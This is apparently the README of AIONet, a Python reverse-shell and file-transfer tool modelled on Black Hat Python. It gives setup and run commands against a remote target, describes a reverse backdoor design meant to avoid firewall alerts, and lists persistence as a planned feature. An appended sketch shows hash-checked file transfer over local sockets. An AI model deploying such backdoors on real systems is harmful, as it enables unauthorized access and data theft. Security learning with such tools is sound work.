AIONet was built as a multipurpose tool to replace netcat. Written in Python3, AIONet offers features like reverse shell spawning, file upload and file download.
The idea for this tool was obtained from chapter 2 of Black Hat Python by Justin Seitz. This program aims to update BHP's tool to provide features like class-based structure, Python3 support and error checking. A detailed explanation of the differences between the two can be found at the end of this document.
- Python3 (>=3.6)
git clone https://github.com/aarole/aionet.git
cd aionet/
wget -O aionet.py https://raw.githubusercontent.com/aarole/aionet/master/aionet.py
An AIONet listener can be created by using an existing Docker image or by building your own.
docker pull aarole/aionet
git clone https://github.com/aarole/aionet.git
cd aionet/
docker build -t aarole/aionet .
docker run --rm -it -v /path/to/some/directory:/opt -p PORT:PORT aarole/aionet -l -p PORT
- /path/to/some/directory
- Directory (a) containing the files you may want to upload, or (b) to which you may want to download files
- Directory path should be on your Docker host
- PORT
- Port on which the listener will listen
- Use the same port in all three locations
On host: python3 aionet.py -p PORT -l
On remote machine: python3 aionet.py -t TARGET -p PORT
Options:
  -t target, --target target   IP address of the remote listener
  -p port, --port port         If used with -l, port where listener is to be created; else, port where remote listener exists
  -l, --listen                 Create a listener on the port defined using -p
  -h, --help                   show this help message and exit
- Program structure overhauled to allow for easy extension
- Created individual classes for the server (listener/host) and the client (target/remote machine)
- Updated program to use reverse backdoors
- Listener is created on the physical machine and remote target connects to it
- Opening a port on the host ensures that firewalls on the remote target do not raise red flags
- Replaced getopt with argparse
- Moved file manipulation (download and upload) to post-shell operations
- Used the base64 library to encode files during upload/download
- Base64 encoding allows for easy transfer of files (especially non-text [pdf, png, jpg] files)
- Used the os library to allow for usage of cd and rm commands
- Added error-checking during file upload/download using SHA256 hashes (provided by hashlib)
- Hash is sent from the source computer along with the message
- The destination hashes the file locally
- If the hashes match, the file is downloaded/uploaded; else, the file is deleted
- Added server-side logging
- If the shell is dropped, all commands run and their respective output is stored in a timestamped log file
- Add support for bind shells
- Add ability to establish persistence
- File download
- Non-text files (png, jpg, pdf) cause errors when downloading them
- Files are partially downloaded and a part of the base64 encoded file is printed
- Fix: Switched from length-based recv to sentinel-based recv
- Exit condition
- exit command is not handled properly on the server
- Fix: Moved handle() call in Server class to outside the while loop
- Downloading files with full path
- Supplying the absolute path to a file being downloaded could potentially cause conflict issues on the host
- Fix: Added a line to replace "/" with "_" so that the user can download files by providing an absolute path without encountering conflict issues, while the full path string is maintained in the downloaded file for their reference
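
The SHA256 check on transfers and the sentinel-based recv fix described above, combined in one sketch. This is an added example, not AIONet's own code: the `<END>` marker, the `|` separator, the function names and the local socket pair standing in for the listener/target connection are all assumptions.

```python
import base64
import hashlib
import socket

# Assumed end-of-message marker; "<" never occurs in base64 or hex output.
SENTINEL = b"<END>"


def pack(data: bytes) -> bytes:
    """Frame a file as base64(data) | sha256(data), terminated by the sentinel."""
    digest = hashlib.sha256(data).hexdigest().encode()
    return base64.b64encode(data) + b"|" + digest + SENTINEL


def recv_until(sock: socket.socket, sentinel: bytes = SENTINEL) -> bytes:
    """Keep reading until the sentinel arrives, however the stream is chunked."""
    buf = bytearray()
    while sentinel not in buf:
        chunk = sock.recv(1024)
        if not chunk:
            raise ConnectionError("peer closed before the sentinel was received")
        buf += chunk
    return bytes(buf[:buf.index(sentinel)])


def unpack(frame: bytes) -> bytes:
    """Decode the payload and reject it if the locally computed hash differs."""
    encoded, _, sent_digest = frame.rpartition(b"|")
    data = base64.b64decode(encoded, validate=True)
    if hashlib.sha256(data).hexdigest().encode() != sent_digest:
        raise ValueError("SHA-256 mismatch, file discarded")
    return data


def transfer(data: bytes, corrupt: bool = False) -> bytes:
    """Send data over a local socket pair; return what the receiver accepts."""
    a, b = socket.socketpair()
    with a, b:
        frame = pack(data)
        if corrupt:  # change the first base64 character to simulate damage
            frame = (b"B" if frame[:1] == b"A" else b"A") + frame[1:]
        a.sendall(frame)
        return unpack(recv_until(b))


if __name__ == "__main__":
    sample = b"\x89PNG\r\n\x1a\n" + bytes(range(256)) * 4  # constructed binary input
    print(len(transfer(sample)), "bytes received and verified")
```

Because the hash travels in the same channel as the file, this check catches truncation or corruption in transit, not modification by someone able to alter the stream.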